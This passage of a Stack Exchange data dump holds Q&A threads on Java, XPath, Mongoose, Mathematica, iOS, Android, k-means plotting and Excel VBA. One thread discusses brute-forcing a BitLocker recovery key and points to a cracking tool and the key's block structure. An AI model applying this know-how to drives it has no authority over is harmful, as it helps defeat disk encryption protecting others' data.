still have enough.\nThis is what the image looks like:\n\nThe errors are fairly well spread out(and we can always apply a fixed permutation or use larger symbols if needed). So now we can apply any error correction step (e.g Reed solomon) we will just take the decoding step (didn't actually do this) and we should get the same output from either image with high likelyhood and still have ~20K bits.\nIf we down scale 5x instead of 10x we get 816 differing bits. but get 4x as many bits, at 0.6% difference. Can play with this and find optimum.\nWe can also probably do better at the quantization step and preserve more information reliably. The aggressive quantization I used will work only for reasonably balanced photos, an over exposed picture will come out all a single value. We could add preprocessing to handle this scenario.\nComment: Comments are not for extended discussion; this conversation has been [moved to chat](https:\/\/chat.stackexchange.com\/rooms\/129266\/discussion-on-answer-by-meir-maor-can-an-arbitrary-physical-image-be-a-key).\n","meta":{"source":"crypto.stackexchange","title":"Can an arbitrary physical image be a key?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Java equivalent to PHP's multidimensional arrays\n\nQuestion: I'm trying to create \"anonymous\" arrays of datas, with non-numeric keys, the same way I could do it in PHP, just like that :\n<code>$datas = [\n [\n 'firstname' => 'Sam',\n 'lastname' => 'Winchester',\n 'job' => 'Hunter',\n 'age' => 30\n ],\n [\n 'firstname' => 'Dean',\n 'lastname' => 'Winchester',\n 'job' => 'Hunter',\n 'age' => 35\n ],\n];\n<\/code>\nI'd like to know if I can do that without creating a specific class or something like that.\nI found some solutions using maps but it's only working with 2 fields, not more.\nThanks.\nAnswer: There is no direct equivalent in Java. You would have to create a class <code>Person<\/code> with 4 fields <code>firstName<\/code>, <code>lastName<\/code>, <code>job<\/code> and <code>age<\/code>, and then use a <code>Person[]<\/code>.\nAnswer: @Paul Boddington 's answer is great too but if you want to have a more general solution, you could create a list of hashmaps.\n<code>List<HashMap<String, String>> data = new ArrayList<>(); \/\/ Diamond expression\nList<HashMap<String, String>> data = new ArrayList<HashMap<String, String>>(); \/\/ non diamond\n<\/code>\nAdding your data of your PHP array into our solution\n<code>HashMap<String, String> personOne = new HashMap<String, String>();\npersonOne.put(\"firstname\", \"Sam\");\npersonOne.put(\"lastname\", \"Winchester\");\n...\ndata.add(personOne);\n<\/code>\nVoila.\nComment: I'm afraid that it wouldn't work since I have different types for each field, such as `int` for the `age` field.\nComment: @AntoineB for dealing with different types of data just declare them as Object like this: `HashMap`\n","meta":{"source":"stackoverflow","title":"Java equivalent to PHP's multidimensional arrays","dup_signals":{}},"subset":"stackexchange"} +{"text":"XPath expression -hierarchy\n\nQuestion: <code> <div class=\"summary-item\">\n <label >Price<\/label>\n <div class=\"value\">\n 0.99 GBP\n <\/div>\n <\/div>\n\n <div class=\"summary-item\">\n <label >Other info<\/label>\n <div class=\"value\">\n All languages\n <\/div>\n <\/div>\n<\/code>\nI am trying to get the \"0.99 GBP\" using an XPath expression, so far I have reached the label using this (note there is another class by the name summary-item, therefore I need to uniquely identify with the label name Price) \n<code>sel.xpath('\/\/*\/div[@class=\"summary-item\"]\/label[text()=\"Price\"]').extract()\n<\/code>\nHowever, I am unable to get to the class, I tried using following-sibling, but I did not succeed, any help will be appreciated. \nAnswer: The existence of child nodes can be part of the predicate. Put the test for <code>label<\/code> into a predicate for the parent, either as a separate predicate (adding the target node as well):\n<code>\/\/div[@class=\"summary-item\"][label[text()=\"Price\"]]\/div[@class=\"value\"]\n<\/code>\nor joined with <code>and<\/code>:\n<code>\/\/div[@class=\"summary-item\" and label[text()=\"Price\"]]\/div[@class=\"value\"]\n<\/code>\n(Note you don't need <code>\/\/*\/div<\/code> at the start.)\nYou could use <code>following-sibling<\/code> if you wanted, it would look like this:\n<code>\/\/div[@class=\"summary-item\"]\/label[text()=\"Price\"]\/following-sibling::div[@class=\"value\"]\n<\/code>\n(here the <code>label<\/code> div isn't part of the predicate).\nOne more thing to be aware of, using XPath to select HTML classes doesn't work the same as using CSS \u2013 XPath will only match the exact string whereas CSS matches even if the element is in more than one class. In this case it works out okay but you should watch out for it. Search StackOverflow if it will be an issue, there are a few answers descibing it.\n","meta":{"source":"stackoverflow","title":"XPath expression -hierarchy","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to fetch documents within a fetched document in promise\n\nQuestion: <code>{\n \"status\": \"SUCCESS\",\n \"ASANA\": {\n \"benefits\": [\n \"5b185c59e7179a074bebfb13\"\n ],\n \"steps\": [\n \"5b186f46e7179a074bec04f5\",\n \"5b186e1be7179a074bec0402\"\n ],\n \"_id\": \"5b11a58d3d62f90c1c717913\",\n \"asanaName\": \"Shavasana\",\n \"asanaDescription\": \"useful for body relaxation\",\n \"__v\": 0\n }\n}\n<\/code>\nHere I have fetched one Asana and how to get benefits collection using that <code>id<\/code>. Below code is to fetch Asanas.\n<code>const fetchAllAsanasDao = () => {\n return new Promise((resolve, reject) => {\n asanas\n .find({})\n .then((asanasResult) => {\n asanas\n .find({})\n resolve(asanasResult);\n })\n .catch((error) => {\n reject(error);\n });\n });\n}\n<\/code>\nComment: What is this? Are you using mongoose? The structure looks like a document out of mongoose. If so then please show the relevant schema and wherever \"benefits\" are stored. You're also wrapping promises with promises for no reason. Please give more detail in the question at any rate because this is really unclear and if you are actually using mongoose and MongoDB it's inappropriately tagged as well.\nComment: I am using mongoose. and i got the solution.thank you\nAnswer: const fetchAllAsanasDao = ({}, {}, query) => {\n return new Promise((resolve, reject) => {\n asanas\n .find({}, {}, query)\n .populate({ path: 'benefits', select: 'benefitsDescription', })\n .populate({ path: 'asanaResources', select: 'asanaResourcesPath' })\n .exec()\n .then((asanasResult) => {\n resolve(asanasResult);\n })\n .catch((error) => {\n reject(error);\n });\n });\n}\n","meta":{"source":"stackoverflow","title":"how to fetch documents within a fetched document in promise","dup_signals":{}},"subset":"stackexchange"} +{"text":"Solving systems of partial differential equations with functions of different number of variables\n\nQuestion: I am trying to solve the following system of two partial differential equations\n$\\partial_t G(x,y,t) + \\partial_x G(x,y,t)+\\partial_y G(x,y,t) = -i\\left[f(x,t) + f(y,t)\\right] $\n$\\partial_t f(x,t) + \\partial_x f(x,t) = f(x,t) - iG(x,0,t)$\nwith initial conditions $f(x,0)=0$ and $G(x,y,0) = G_0(x,y)$ where $G_0$ is a given function (e.g., a double Gaussian packet in the x-y plane)\nI tried the following code:\n<code>L = 1; T = 1; x0 = -L\/4; sigma = L\/30; \nsol = NDSolve[{\n D[G[x, y, t], t] == -(D[G[x, y, t], x] + D[G[x, y, t], y]) - I*(f[x, t] + f[y, t]),\n D[f[x, t], t] == -D[f[x, t], x] + f[x, t] - I*(G[x, 0, t]),\n G[x, y, 0] == Exp[-((x - x0)\/(Sqrt[2]*sigma))^2 - ((y - x0)\/(Sqrt[2]*sigma))^2],\n f[x, 0] == 0\n },\n {G, f}, {x, -L\/2, L\/2}, {y, -L\/2, L\/2}, {t, 0, T},\n MaxSteps -> 500]`\n<\/code>\nBut I get the errors:\n<code>Function::fpct: Too many parameters in {x,y,t} to be filled from Function[{x,y,t},0][x,t].\n\nFunction::fpct: Too many parameters in {x,y,t} to be filled from Function[{x,y,t},0][-0.5,0.].\n\nFunction::fpct: Too many parameters in {x,y,t} to be filled from Function[{x,y,t},0][-0.5,0.].\n\nGeneral::stop: Further output of Function::fpct will be suppressed during this calculation.\n\nNDSolve::ndnum: Encountered non-numerical value for a derivative at y == 0.`.\n\nNDSolve::ndnum: Encountered non-numerical value for a derivative at y == 0.`.\n<\/code>\nAny suggestion on how to proceed?\nComment: The warning is probably because you forgot to `Clear[f]` first. Then you need to add proper artificial b.c. for your problem because otherwise we won't know what b.c. is added to `NDSolve`. (See [this post](https:\/\/mathematica.stackexchange.com\/q\/73961\/1871) for more information. ) The most troublesome part `f[x, t] + f[y, t]` still remains though, but I think it's not too hard to overcome. If you supplement proper b.c., I can have a try.\nComment: Hi, thanks for your answer. Using Clear[f] before the code did not remove the warning.\nRegarding the boundary conditions: I expect the initial \"pulse\" (in the xy plane) never to approach the boundaries, so probably the exact boundary conditions are not important. I think periodic boundary conditions should work, or whatever else you think it may be easy to implement.\nAnswer: First of all, I'd like to point out the warning <code>Function::fpct<\/code> is probably because you've executed <code>f = Function[{x, y, t}, 0];<\/code> and forgotten to <code>Clear[f]<\/code> then. This isn't the main issue, of course.\nThe main issue is, currently <code>NDSolve<\/code> can't handle equation system whose unknown functions are defined on different domains. (In your case, $G\\in [-\\frac{L}{2},\\frac{L}{2}]\\times[-\\frac{L}{2},\\frac{L}{2}]\\times[0,T]$ and $f\\in [-\\frac{L}{2},\\frac{L}{2}]\\times[0,T]$. ) So let's discretize the system to an ODE system ourselves.\nI'll use <code>pdetoode<\/code> for the generation of ODEs.\nFirst, supplement b.c. to the system. Since you've mentioned b.c. isn't important here, I simply use zero Dirichlet b.c.:\n<code>L = 1; T = 1; x0 = -L\/4; sigma = L\/30;\ndomain = {-L\/2, L\/2};\n{eq1, eq2} = {D[G[x, y, t], t] == -(D[G[x, y, t], x] + D[G[x, y, t], y]) - \n I (f[x, y, t] + f2[x, y, t]), \n D[f[x, t], t] == -D[f[x, t], x] + f[x, t] - I (G2[x, t])};\n\n{ic1, ic2} = {G[x, y, 0] == \n Exp[-((x - x0)\/(Sqrt[2] sigma))^2 - ((y - x0)\/(Sqrt[2] sigma))^2], f[x, 0] == 0};\n\n{bc1, bc2} = {G[x, y, t] == 0 \/. Outer[{# -> #2} &, {x, y}, domain],\n f[x, t] == 0 \/. List \/@ Thread[x -> domain]};\n<\/code>\nNotice I've modified the form of PDE system a bit (<code>f[x, t] -> f[x, y, t]<\/code>, <code>f[y, t] -> f2[x, y, t]<\/code>, <code>G[x, 0, t] -> G2[x, t]<\/code> ) because <code>pdetoode<\/code> can't handle functions defined in different domains all in once, either.\nNext step is discretization. I've defined 2 functions <code>ptoofunc1<\/code> and <code>ptoofunc2<\/code> for the discretization of 2 domains.\n<code>points = 71; \ngrid = Array[# &, points, domain];\ndifforder = 4;\n(* Definition of pdetoode isn't included in this post,\n please find it in the link above. *)\n\nptoofunc1 = pdetoode[{G, f, f2}[x, y, t], t, {grid, grid}, difforder];\nptoofunc2 = pdetoode[{G2, f}[x, t], t, grid, difforder];\n\ndel = #[[2 ;; -2]] &;\nrule1 = {f[x_, y_][t_] :> f[x][t], f2[x_, y_][t_] :> f[y][t]};\nrule2 = G2[x_][t_] :> G[x, 0][t];\node1 = del \/@ del@ptoofunc1@eq1 \/. rule1;\node2 = del@ptoofunc2@eq2 \/. rule2;\nodeic1 = ptoofunc1@ic1;\nodeic2 = ptoofunc2@ic2;\n<\/code>\nNotice <code>points<\/code> should be an odd number, or <code>G[x, 0, t]<\/code> won't be properly handled.\n<code>del<\/code> is a function for deleting equations at boundary to \"make room\" for b.c.s because <code>ptoofunc1<\/code> and <code>ptoofunc2<\/code> generate equations for every grid points. <code>rule1<\/code> and <code>rule2<\/code> is for transforming <code>f2<\/code> and <code>G2<\/code> back to <code>f<\/code> and <code>g<\/code>.\n<code>diff = With[{sf = 1}, diffbc[t, sf]];\nodebc1 = diff@MapAt[del \/@ # &, ptoofunc1@bc1, {1}];\nodebc2 = diff@ptoofunc2@bc2;\n<\/code>\n<code>diff<\/code> is for transforming the disretized b.c. to (almost) equivalent ODEs. Well I admit the code above is a bit advanced, to have a better understanding for the whole process you may want to read this post.\nThe last step is to solve the system and rebuild the solutions to 2 interpolating functions:\n<code>sol = NDSolveValue[{ode1, ode2, odeic1, odeic2, odebc1, odebc2}, {Outer[G, grid, grid], \n f \/@ grid}, {t, 0, T}];\n\nsolG = rebuild[sol[[1]], {grid, grid}, 3];\nsolf = rebuild[sol[[2]], grid, 2];\n<\/code>\nLet's check the solution:\n<code>Manipulate[Plot3D[solG[x, y, t] \/\/ Evaluate , {x, ##}, {y, ##}, \n PlotRange -> {-0.1, 1}], {t, 0, T}] & @@ domain\n<\/code>\n\n<code>Manipulate[Plot[solf[x, t] \/\/ Abs \/\/ Evaluate, {x, ##}, PlotRange -> {0, 0.2}], {t, 0, \n T}] & @@ domain\n<\/code>\n\nIf you prefer periodic b.c.:\n<code>ptoofunc1 = pdetoode[{G, f, f2}[x, y, t], t, {grid, grid}, difforder, True];\nptoofunc2 = pdetoode[{G2, f}[x, t], t, grid, difforder, True];\n \node1 = ptoofunc1@eq1 \/. rule1;\node2 = ptoofunc2@eq2 \/. rule2;\nodeic1 = ptoofunc1@ic1;\nodeic2 = ptoofunc2@ic2;\n\nsol = NDSolveValue[{ode1, ode2, odeic1, odeic2}, {Outer[G, grid, grid], f \/@ grid}, {t, \n 0, T}];\n\nsolG = rebuild[sol[[1]], {grid, grid}, 3];\nsolf = rebuild[sol[[2]], grid, 2];\n<\/code>\nAnswer: Well from the link below DSolve , in this stage of development can only handle 2 independent variables. \nhttp:\/\/reference.wolfram.com\/language\/tutorial\/DSolveIntroductionToPDEs.html\nComment: Thanks for the info. Do you know if the same limit applies to NDSolve? I could not find anything in the the documentation.\n","meta":{"source":"mathematica.stackexchange","title":"Solving systems of partial differential equations with functions of different number of variables","dup_signals":{}},"subset":"stackexchange"} +{"text":"App crashes when trying to access a viewcontroller from AppDelegate\n\nQuestion: This is how I am trying to get my PlayersViewController:\n<code>UITabBarController *tabBarController = (UITabBarController*)self.window.rootViewController;\nUINavigationController *navigationController = [tabBarController viewControllers][0];\nPlayersViewController *playersViewController = [navigationController viewControllers][0];\n<\/code>\nThe app crashes after the 3rd line with the following error:\n<code>Terminating app due to uncaught exception 'NSInvalidArgumentException', reason: '-[UIViewController viewControllers]: unrecognized selector sent to instance 0x715b290'\n<\/code>\nI am new to IOS programming so I can't figure out what the problem is. I am not getting my PlayersViewController correct ? Here is the image with my storyboard.\nComment: Navigation Controller doesn't have the views added to it yet by the looks of it.\nComment: @FaddishWorm: And how can I do this ?\nAnswer: The <code>UINavigationController<\/code> that contains the <code>PlayersViewController<\/code> controller is at index 1 in the tab bar controller's <code>viewControllers<\/code> array. The indexing is from left to right, that is, the leftmost tab has index 0. The \"Players\" tab is to the right of the \"Gestures\", and the tab bar has two items, so therefore the view controller associated with that tab index is at index 1.\nThe message you are seeing is because at index 0 there is a <code>UIViewController<\/code> instance corresponding with the label \"View Controller - Gestures\" in your storyboard, and you are trying to send it a message that <code>UIViewController<\/code> does not respond to, in the belief that it is a <code>UINavigationController<\/code>.\n","meta":{"source":"stackoverflow","title":"App crashes when trying to access a viewcontroller from AppDelegate","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to label cluster after applying to k-mean clustering to dataset?\n\nQuestion: I have a dataset in .csv format which looks like this -\ndata\n<code>x,y,z, label\n2,1,3, A\n5,3,1, B\n6,2,2, C\n9,5,3, B\n2,3,4, A\n4,1,4, A\n\n<\/code>\nI would like to apply k-mean clustering to the above dataset. As we see above the 3 dimension dataset(x-y-z). And after that, I would like to visualize the clustering in 3-dimension with a specific cluster label in diagram. Please let know if you need more details.\nI have used for 2-dimension dataset as see below -\n<code>kmeans_labels = cluster.KMeans(n_clusters=5).fit_predict(data)\n\n<\/code>\nAnd plot the visualize for 2-dimension dataset,\n<code>plt.scatter(standard_embedding[:, 0], standard_embedding[:, 1], c=kmeans_labels, s=0.1, cmap='Spectral');\n<\/code>\nSimilarly, I would like to plot 3-dimension clustering with label. Please let me know if you need more details.\nAnswer: Could something like that be a good solution?\n<code>import numpy as np\nfrom sklearn.cluster import KMeans\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndata = np.array([[2,1,3], [5,3,1], [6,2,2], [9,5,3], [2,3,4], [4,1,4]])\n\ncluster_count = 3\nkm = KMeans(cluster_count)\nclusters = km.fit_predict(data)\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nscatter = ax.scatter(data[:, 0], data[:, 1], data[:, 2], c=clusters, alpha=1)\n\nlabels = [\"A\", \"B\", \"C\"]\nfor i, label in enumerate(labels):\n ax.text(km.cluster_centers_[i, 0], km.cluster_centers_[i, 1], km.cluster_centers_[i, 2], label)\n\nax.set_title(\"3D K-Means Clustering\")\nax.set_xlabel(\"x\")\nax.set_ylabel(\"y\")\nax.set_zlabel(\"z\")\nplt.show()\n<\/code>\n\nEDIT\nIf you want a legend instead, just do this:\n<code>import numpy as np\nfrom sklearn.cluster import KMeans\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndata = np.array([[2,1,3], [5,3,1], [6,2,2], [9,5,3], [2,3,4], [4,1,4]])\n\ncluster_count = 3\nkm = KMeans(cluster_count)\nclusters = km.fit_predict(data)\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nscatter = ax.scatter(data[:, 0], data[:, 1], data[:, 2], c=clusters, alpha=1)\n\nhandles = scatter.legend_elements()[0]\nax.legend(title=\"Clusters\", handles=handles, labels = [\"A\", \"B\", \"C\"])\n\nax.set_title(\"3D K-Means Clustering\")\nax.set_xlabel(\"x\")\nax.set_ylabel(\"y\")\nax.set_zlabel(\"z\")\nplt.show()\n<\/code>\nComment: So you want a...legend! XD I've just edited my answer!\nComment: Do you mean the number of clusters? Look at the `cluster_count` variable.\nComment: `fig = plt.figure(figsize=(16, 12))`\nComment: Do you know moveable figure in all 3d? Because of this image, I can't see the cluster hidden inside.\nComment: sorry, your question is not clear to me. Can you rephrase it please? Thanks.\nComment: Does rotating the figure help?\nComment: so, has the issue been solved now?\nComment: Try `scatter = ax.scatter(data[:, 0], data[:, 1], data[:, 2], c=clusters, alpha=0.3)`\nComment: So, post a new question on SO about this issue, please. Thanks.\nComment: Is something not ok with this answer? Thanks.\n","meta":{"source":"stackoverflow","title":"How to label cluster after applying to k-mean clustering to dataset?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How would I brute-force a Bitlocker recovery key?\n\nQuestion: I have imaged a hard disk and used passware, but to no avail - it says Encryption key External key, and not the actual key.\nHow do you think I would go about brute forcing it? Lets assume I had infinite time, what software(s) could I use for this?\nIm quite interested in the concept and would like to test it on a drive I locked with TPM and a PIN, so any pointers from here would be useful and much appreciated.\nThanks in advance...\nAnswer: Well you have to brute-force the 48 character recovery key (https:\/\/blogs.msdn.microsoft.com\/si_team\/2006\/08\/10\/bitlocker-recovery-password-details\/)\nAs I remember it visually shown when 6 character sub-key is successfully entered so I guess it is possible but if there are tools available I'm unaware of. \nGood luck\nComment: Thanks for that info - do you know specifically what software I could use to automate this for me?\n\nI.e. Passware Kit forensic supports Hardware Acceleration, but for unknown reasons its not working for me..\nComment: The visual notification is based on a simple checksum (I believe it had something to do with sums of alternating digits matching or something) to help prevent typos, it does not store any partial key data that can be used to crack the key. Actually, the details for it are in that page you linked. It checks for divisibility by 11.\nAnswer: You can use bitcracker. This tool was developed for that, for brute forcing BitLocker recovery key or user password.\nBitcracker performs a dictionary attack, so you still need to create a list of possible recovery keys. And you should be careful with creating such kind of list because there are special conditions for recovery key (look through this paper, chapter 5.4, for details or Microsoft documentation).\nAnswer: https:\/\/docs.microsoft.com\/en-us\/archive\/blogs\/si_team\/bitlocker-recovery-password-details\nsays\n\nWhen a user is entering the key, we accept it 6 digits at a time, and\nthen check to see if the number they just entered is exactly divisible\nby 11. If it is then we know it might form part of the key - if it\ndoesn't then we know for sure it isn't a valid block. This guards\nagainst swapped digits, mis-entered numbers, etc, and we can safely\nreport the entry error to the user.\nBut does this check reduce the amount of work an attacker would have\nto do to brute force the underlying key? Consider that when we check a\ngroup of digits we aren't saying that they are the 'correct' group for\nthat location in the key - merely that they could be a correct group,\nas they are divisible by 11.\n\nIts just to help the user that its probably the correct sequence, it could still be wrong.\n","meta":{"source":"security.stackexchange","title":"How would I brute-force a Bitlocker recovery key?","dup_signals":{}},"subset":"stackexchange"} +{"text":"pyhamcrest - Compare two list\n\nQuestion: I've just started learning python. Currently writing a unit test to assert if the elements in the expected list is present in the actual list\n<code>def test_compare_list_of_items():\n actual_list_of_items = ['a','b']\n expected_list_of_items = ['a']\n\n assert_that(actual_list_of_items, has_item(has_items(expected_list_of_items))) \n<\/code>\nbut i'm getting errors like\n<code>E Expected: a sequence containing (a sequence containing <['a']>)\nE but: was <['a', 'b']>\n<\/code>\nHow and what sequence matcher should i use in order to assert if item 'a' in the expected list is present in the actual list?\nComment: what is `has_items`?\nComment: `has_items` match if all given items appear in the sequence, in any order https:\/\/github.com\/hamcrest\/PyHamcrest\nComment: sounds like you might be using the wrong function in that library then\nComment: @aws_apprentice - Would appreciate, if you could let me know the right function from the available list.\nAnswer: You are using <code>has_item<\/code> when you should only be using <code>has_items<\/code>. According to the docs this takes multiple matchers which is what you want. Your function then becomes\n<code>def test_compare_list_of_items():\n actual_list_of_items = ['a','b']\n expected_list_of_items = ['a']\n\n assert_that(actual_list_of_items, has_items(*expected_list_of_items))\n<\/code>\nWe use iterable unpacking for the list to feed as the arguments and now when you run it, it shouldn't error out.\nComment: Thanks! I tried that earlier but it doesn't work: ```def test_compare_list_of_items():\n actual_list_of_items = ['a','b']\n expected_list_of_items = ['a']\n> assert_that(actual_list_of_items, has_items(expected_list_of_items))\nE AssertionError:\nE Expected: (a sequence containing <['a']>)\nE but: a sequence containing <['a']> was <['a', 'b']>```\nComment: you're missing the `*`, please copy my answer directly how it is, the issue is that you aren't _unpacking_ the list, note the `*` directly in front of `expected_list_of_items`\nComment: Oh ok! Thanks a lot @aws_apprentice. I read the document again and now i got what you were trying to say above. This helped a lot\nAnswer: I don't know about <code>has_items<\/code> function, but can you just use something like this?\n<code>assertTrue(all(item in expected_list_of_items for item in actual_list_of_items))\n<\/code>\nComment: Thanks Marcos! I do have a work around but i want to use pyhamcrest matchers and hence the question. Any help would be appreciated\n","meta":{"source":"stackoverflow","title":"pyhamcrest - Compare two list","dup_signals":{}},"subset":"stackexchange"} +{"text":"how take details from a class\n\nQuestion: I have a method that gives me back all the films with a particular word inserted by user.\nNow I want to copy all the details in one list so, when the user clicks a film that the app shows, it shows a toast with the corresponding ID.\n<code>How can i do this?\n\nusing System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\n\nusing Android.App;\nusing Android.Content;\nusing Android.OS;\nusing Android.Runtime;\nusing Android.Views;\nusing Android.Widget;\n\nnamespace App_wrapper\n{\n\n public class Result1\n {\n public int vote_count { get; set; }\n public int id { get; set; }\n public bool video { get; set; }\n public double vote_average { get; set; }\n public string title { get; set; }\n public double popularity { get; set; }\n public string poster_path { get; set; }\n public string original_language { get; set; }\n public string original_title { get; set; }\n public List<int> genre_ids { get; set; }\n public string backdrop_path { get; set; }\n public bool adult { get; set; }\n public string overview { get; set; }\n public string release_date { get; set; }\n }\n\n public class RootObject\n {\n public int page { get; set; }\n public int total_results { get; set; }\n public int total_pages { get; set; }\n public List<Result1> results { get; set; }\n }\n}\n<\/code>\nComment: Took code from link and inserted it into the post instead, also brushed up the grammar a bit\nAnswer: Try this\n<code>Public List<Film> filmList;\n\npublic class Film\n{\n private String title;\n private String id;\n\n public Film(String title, String id)\n {\n this.title = title;\n this.id = id;\n }\n\n public String getId()\n {\n return id;\n }\n\n public override string ToString()\n {\n return title;\n }\n}\n\nforeach (var paolo in toor.results)\n{\n var fItem=new Film{title=paolo.title,id=paolo.id}\n filmList.Add(fItem);\n}\n\nRunOnUiThread(() =>\n{\n adapter = new ArrayAdapter<string>(this, Android.Resource.Layout.SimpleListItem1, filmList);\n lv.Adapter = adapter;\n});\n\n\/\/inside ListView_ItemClick\n\nvar id_film = filmList.ElementAt(e.Position).id;\n<\/code>\nFor reference \nhow to use an ArrayAdapter in android of custom objects\nComment: can i put the public class film inside my main activity? if yes where? inside \"protected override void OnCreate(Bundle savedInstanceState)\"? or after \"before public class dettagli_film : Activity\"\nComment: Don't keep public classes inside Activity. Keep outside where you have your classes like RootObject. I have just given you overview of code.\nComment: ok thanks. I added a new class called film, then i copy Public List filmList; inside the main activity, and the for each inside the main activiy, but i have error in the foreach. i have film, title and id underlined in red, why? it says me that id and title are not accessible due to the level of protection\nComment: Id & title in film class make public. You should think about these little things.\nComment: try this `var fItem=new Film(paolo.title,paolo.id);`\nComment: don't work. the problem now is in paolo.id. Visual studio says that it is impossibile to convert from int to string. But i changed the class Film. id now is an int and not a string EDIT: solved i changed the type of id in the RootObject, now is a string\nComment: now i have a new error in the arrayadapter. if i change \"dati\" with \"filmList\" it says me that is impossibile to convert from \"System.Collection.Generic.List in int. Why?\nComment: inside RunOnUiThread make ArrayAdapter to ArrayAdapter. Both side left & right.\nComment: last one error i hope. this is my new main activity https:\/\/pastebin.com\/WfRY8vDu i declered two public string : film and id at the begin of the main activity, but in the string \"var id_film = filmList.ElementAt(e.Position).id;\" i have protection error in id variable. why? EDIT RESOLVED\nComment: if i start my application and press the button \"ricerca film\" i have an exception and the Visual studio program underline this string \"lv.Adapter = adapter;\" why? here the activity https:\/\/pastebin.com\/ipteSs3H\nComment: my app is so composed: in the first activity i have 2 botton. one for search any film , second for search any tv series. If i press the first button, the user enter in the activity of the search and the app crash. it give my this error lv.Adapter=adapter; why? Unhandled Exception:\n\nJava.Lang.NullPointerException: Attempt to invoke interface method 'int java.util.List.size()' on a null object reference\nComment: Ask this question J\"ava.Lang.NullPointerException: Attempt to invoke interface method 'int java.util.List.size()' \" with your related code. People will try to answer. Don't forget to add code with description like this is \"class\", \"this is listClick evet\" etc. Happy coding.\nComment: maybe the problem is the adapter man. i can't do new ArrayAdapter, maybe i have to build a custom adapter. Is it possible?\n","meta":{"source":"stackoverflow","title":"how take details from a class","dup_signals":{}},"subset":"stackexchange"} +{"text":"Hide button on UIWebView when Internet is available\n\nQuestion: I have an iOS 7 app with a <code>UIWebView<\/code>. \nWhen there is no Internet connection I want to add a picture to the web view, along with some text (\"No Internet connection\") as well as a button for refreshing the page. \nI can add the button alright, but it is not hidden when the Internet connection is on. I want to hide button text and picture when the device has Internet and hide them when there is no Internet.\nAnswer: I recommend you to use Reachability to track changes between offline\/online (https:\/\/github.com\/tonymillion\/Reachability).\n<code>\/\/ Allocate a reachability object\nReachability* reach = [Reachability reachabilityWithHostname:@\"www.google.com\"];\n\n\/\/ Set the blocks \nreach.reachableBlock = ^(Reachability *reach)\n{\n \/\/ Hide button\n};\n\nreach.unreachableBlock = ^(Reachability *reach)\n{\n \/\/ Show button\n};\n\n\/\/ Start the notifier, which will cause the reachability object to retain itself!\n[reach startNotifier];\n<\/code>\n","meta":{"source":"stackoverflow","title":"Hide button on UIWebView when Internet is available","dup_signals":{}},"subset":"stackexchange"} +{"text":"App crashes when assigning new adapter to my ViewPager\n\nQuestion: I have a <code>ViewPager<\/code> which is populated by a <code>FragmentStatePagerAdapter<\/code> when the app starts:\n<code> ViewPager mViewPager;\n\n ...\n\n @Override\n public void onViewCreated(View view, Bundle savedInstanceState) \n {\n super.onViewCreated(view, savedInstanceState);\n\n mViewPager = (ViewPager) view.findViewById(R.id.viewpager);\n mViewPager.setAdapter(new PageAdapter(getChildFragmentManager()));\n \/\/PageAdapter extends from FragmentStatePagerAdapter\n }\n<\/code>\nThis works fine as it should.\nNow, when the user changes the settings of the app I'd like to assign a new Adapter to the ViewPager like this:\n<code>@Override\npublic void updateObserver(SETTING_KEY key) \n{\n mViewPager.setAdapter(new PageAdapter(getChildFragmentManager()));\n Log.d(\"info\", \"updating\");\n}\n<\/code>\nUnfortunately the app crashes after calling <code>updateObserver<\/code> with this exception:\n\n01-22 23:22:45.957: E\/AndroidRuntime(13131): FATAL EXCEPTION: main\n 01-22 23:22:45.957: E\/AndroidRuntime(13131): java.lang.IllegalStateException: Fragement no longer exists for key f0: index 0\n 01-22 23:22:45.957: E\/AndroidRuntime(13131): at android.support.v4.app.FragmentManagerImpl.getFragment(FragmentManager.java:575)\n 01-22 23:22:45.957: E\/AndroidRuntime(13131): at android.support.v4.app.FragmentStatePagerAdapter.restoreState(FragmentStatePagerAdapter.java:211)\n 01-22 23:22:45.957: E\/AndroidRuntime(13131): at android.support.v4.view.ViewPager.onRestoreInstanceState(ViewPager.java:1281)\n 01-22 23:22:45.957: E\/AndroidRuntime(13131): at android.view.View.dispatchRestoreInstanceState(View.java:13188)\n 01-22 23:22:45.957: E\/AndroidRuntime(13131): at android.view.ViewGroup.dispatchRestoreInstanceState(ViewGroup.java:2850)\n 01-22 23:22:45.957: E\/AndroidRuntime(13131): at android.view.ViewGroup.dispatchRestoreInstanceState(ViewGroup.java:2856)\n 01-22 23:22:45.957: E\/AndroidRuntime(13131): at android.view.View.restoreHierarchyState(View.java:13166)\n 01-22 23:22:45.957: E\/AndroidRuntime(13131): at android.support.v4.app.Fragment.restoreViewState(Fragment.java:425)\n ...\n\nHow do I assign an new Adapter to the <code>ViewPager<\/code> without crashing the app?\nComment: Have you tried this? http:\/\/stackoverflow.com\/questions\/12783571\/android-viewpager-change-adapter\n\nEdit: I see this is from one year ago.\nAnswer: Use getFragmentManager() instead of getChildFragmentManager().\nAnswer: Have you check this thread ?\njava.lang.IllegalStateException: Fragement no longer exists for key f1: index 3\n. Use <code>FragmentPagerAdapter<\/code> instead of <code>FragmentStatePagerAdapter<\/code> if you dont care about the Fragment's state restoring when you app go back from background.\n","meta":{"source":"stackoverflow","title":"App crashes when assigning new adapter to my ViewPager","dup_signals":{}},"subset":"stackexchange"} +{"text":"\"unable to set the size property of the font class\" error in Excel VBA for conditional formatting, sheet is NOT protected\n\nQuestion: I have a long VBA macro like this:\n<code>Private Sub ApplyCondFormRun(CellFormat As Range, ValidFormula As String, TargetRange As Range, StopIfTrue As Boolean, Strict As Boolean)\n'For this to work, cell addresses in validation formula must point to the first row\n'of target cell\n\nDim ArrFormat(1 To 9) As Variant\nDim i As Long\n\n'Application.ScreenUpdating = False\n\n'attributes to be copied to destination cells\nWith CellFormat\n ArrFormat(1) = .Font.Color 'Number\n ArrFormat(2) = .Font.Size 'Number\n ArrFormat(3) = .Font.Bold 'Boolean\n ArrFormat(4) = .Font.Italic 'Boolean\n ArrFormat(5) = .Font.Underline 'No: -4142, Single: 2, Double: -4119, Single 